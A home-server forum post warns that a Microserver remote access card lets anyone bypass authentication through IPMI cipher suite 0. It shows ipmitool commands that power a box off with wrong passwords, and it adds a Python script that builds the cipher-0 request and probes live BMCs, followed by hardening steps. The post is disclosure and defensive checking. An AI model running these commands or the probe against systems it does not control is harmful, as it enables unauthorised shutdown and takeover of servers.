RESET Forums (homeservershow.com)

Careful! Authentication bypass in Microserver Remote Access Card


e4Bkt


I registered here just to share this warning.

 

HP recently published a security advisory. Document c03844348. It only mentions servers with iLO hardware, but the Microserver's Remote Access Card (615095-B21) is vulnerable too.

 

The issue is authentication bypass. Anybody can send commands to the box without knowing the password. Firmware 1.2 and 1.3 are both vulnerable.

 

Here's how it works. I'll query the status of the box from a remote Linux system using the password 'abc':

 

$ ipmitool -I lanplus -C 0 -H 192.168.1.141 -U admin -P abc chassis status

System Power         : on
Power Overload       : false
Power Interlock      : inactive
Main Power Fault     : false
Power Control Fault  : false
Power Restore Policy : always-off
Last Power Event     : command
Chassis Intrusion    : inactive
Front-Panel Lockout  : inactive
Drive Fault          : false
Cooling/Fan Fault    : false
 
Cool, the box is on. Should I know that? Can I change that? The correct password is not 'abc'.
 
$ ipmitool -I lanplus -C 0 -H 192.168.1.141 -U admin -P 123 power off
Chassis Power Control: Down/Off
 
I used a different password and didn't get any errors back...
 
$ ipmitool -I lanplus -C 0 -H 192.168.1.141 -U admin -P xyz chassis status
System Power         : off
Power Overload       : false
Power Interlock      : inactive
Main Power Fault     : false
Power Control Fault  : false
Power Restore Policy : always-off
Last Power Event     : command
Chassis Intrusion    : inactive
Front-Panel Lockout  : inactive
Drive Fault          : false
Cooling/Fan Fault    : false
 
Crap. Now the box is off. 'abc', '123' and 'xyz' are not the correct password. Setting the cipher type to zero allows complete authentication bypass.
 
Unchecking "enable IPMI over LAN" prevents the problem unless, y'know, you wanted to actually use IPMI for something...
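What `ipmitool -C 0` actually puts on the wire, and how to check your own BMC for it, as an added example that is not part of the original post. `-C 0` selects IPMI 2.0 cipher suite 0: authentication algorithm RAKP-none, integrity none, confidentiality none. If the BMC answers the RMCP+ Open Session Request with status 0 and echoes those three algorithm IDs, the following RAKP exchange never checks the password, which is why any of 'abc', '123' or 'xyz' works above. The script below builds that request, parses the Open Session Response, and reports whether cipher suite 0 was accepted. The two sample responses are constructed for the offline demonstration (not captures from the Remote Access Card), and the `probe()` helper that sends the request to a live BMC on UDP 623 is an assumption about how you would run it against your own host.

```python
"""Check whether a BMC accepts IPMI 2.0 cipher suite 0 (RAKP-none, i.e. no authentication)."""
import socket
import struct

RMCP_HDR = bytes([0x06, 0x00, 0xFF, 0x07])  # RMCP version 6, reserved, seq 0xFF, class 7 = IPMI
AUTH_TYPE_RMCPPLUS = 0x06                    # IPMI 2.0 session header marker
PAYLOAD_OPEN_SESSION_REQ = 0x10
PAYLOAD_OPEN_SESSION_RSP = 0x11
PRIV_ADMIN = 0x04
STATUS_NO_CIPHER_MATCH = 0x11                # RMCP+ status: no cipher suite match

# Cipher suites as (authentication, integrity, confidentiality) algorithm IDs from the IPMI 2.0 spec.
CIPHER_SUITES = {
    0: (0x00, 0x00, 0x00),   # RAKP-none / none / none      <- the one ipmitool -C 0 asks for
    3: (0x01, 0x01, 0x01),   # RAKP-HMAC-SHA1 / HMAC-SHA1-96 / AES-CBC-128
    17: (0x03, 0x04, 0x01),  # RAKP-HMAC-SHA256 / HMAC-SHA256-128 / AES-CBC-128
}


def _algo_payload(kind, algo):
    """8-byte algorithm record: type (0 auth, 1 integrity, 2 confidentiality), 2 reserved, len 8, algo, 3 reserved."""
    return bytes([kind, 0, 0, 0x08, algo & 0x3F, 0, 0, 0])


def build_open_session_request(suite, console_sid=0xA0A1A2A3, tag=0x00):
    """RMCP+ Open Session Request proposing one cipher suite at Administrator privilege."""
    auth, integ, conf = CIPHER_SUITES[suite]
    payload = (bytes([tag, PRIV_ADMIN, 0, 0]) + struct.pack("<I", console_sid)
               + _algo_payload(0x00, auth) + _algo_payload(0x01, integ) + _algo_payload(0x02, conf))
    # Session header: auth type, payload type, session ID 0 and seq 0 (no session yet), payload length.
    session_hdr = (bytes([AUTH_TYPE_RMCPPLUS, PAYLOAD_OPEN_SESSION_REQ])
                   + struct.pack("<IIH", 0, 0, len(payload)))
    return RMCP_HDR + session_hdr + payload


def parse_open_session_response(pkt):
    """Decode an Open Session Response; algorithm fields are only present when status == 0."""
    if len(pkt) < 16 or pkt[:4] != RMCP_HDR or pkt[4] != AUTH_TYPE_RMCPPLUS:
        raise ValueError("not an RMCP+ packet")
    if pkt[5] & 0x3F != PAYLOAD_OPEN_SESSION_RSP:
        raise ValueError("unexpected payload type 0x%02x" % (pkt[5] & 0x3F))
    plen = struct.unpack_from("<H", pkt, 14)[0]
    p = pkt[16:16 + plen]
    result = {"tag": p[0], "status": p[1], "max_priv": p[2] & 0x0F}
    if result["status"] == 0:
        result["console_sid"], result["bmc_sid"] = struct.unpack_from("<II", p, 4)
        result["auth"], result["integ"], result["conf"] = p[16] & 0x3F, p[24] & 0x3F, p[32] & 0x3F
    return result


def accepts_cipher0(response):
    """True when the BMC agreed to open a session with no authentication, integrity or encryption."""
    r = parse_open_session_response(response)
    return r["status"] == 0 and (r["auth"], r["integ"], r["conf"]) == (0, 0, 0)


def probe(host, port=623, timeout=3.0):
    """Send the cipher-0 request to a live BMC (assumed reachable on UDP 623) and classify its answer."""
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
        s.settimeout(timeout)
        s.sendto(build_open_session_request(0), (host, port))
        data, _ = s.recvfrom(1024)
    return accepts_cipher0(data)


def _sample_response(status, algos=(0, 0, 0), bmc_sid=0x00000001):
    """Constructed Open Session Response for the offline demo; on error the BMC returns only the first 8 bytes."""
    auth, integ, conf = algos
    payload = (bytes([0x00, status, PRIV_ADMIN, 0]) + struct.pack("<II", 0xA0A1A2A3, bmc_sid)
               + _algo_payload(0x00, auth) + _algo_payload(0x01, integ) + _algo_payload(0x02, conf))
    if status != 0:
        payload = payload[:8]
    hdr = bytes([AUTH_TYPE_RMCPPLUS, PAYLOAD_OPEN_SESSION_RSP]) + struct.pack("<IIH", 0, 0, len(payload))
    return RMCP_HDR + hdr + payload


VULNERABLE_RESPONSE = _sample_response(0x00, (0, 0, 0))         # constructed: BMC accepted suite 0
HARDENED_RESPONSE = _sample_response(STATUS_NO_CIPHER_MATCH)    # constructed: BMC refused it

if __name__ == "__main__":
    import sys
    if len(sys.argv) > 1:
        print("accepts cipher suite 0:", probe(sys.argv[1]))   # e.g. python ipmi_c0.py 192.168.1.141
    else:
        print("request:", build_open_session_request(0).hex())
        print("constructed vulnerable BMC:", accepts_cipher0(VULNERABLE_RESPONSE))
        print("constructed hardened BMC:", accepts_cipher0(HARDENED_RESPONSE))
```

A BMC that returns status 0 here is not "slightly weak"; there is no password check anywhere in the session that follows, so treat it exactly like the power-off above. The fix is to stop the BMC offering suite 0, not to pick a better password. On firmware that honours it, `ipmitool lan print <channel>` lists the enabled "RMCP+ Cipher Suites", and `ipmitool lan set <channel> cipher_privs XaaaXXaaaXXaaXX` (X = suite unused, a = Administrator, one character per suite ID starting at 0) disables suite 0 while keeping the HMAC-based suites; whether the Remote Access Card firmware accepts that setting is not something this post establishes, so re-run the probe afterwards and, if it still says True, disabling IPMI over LAN as the poster did is the only option left.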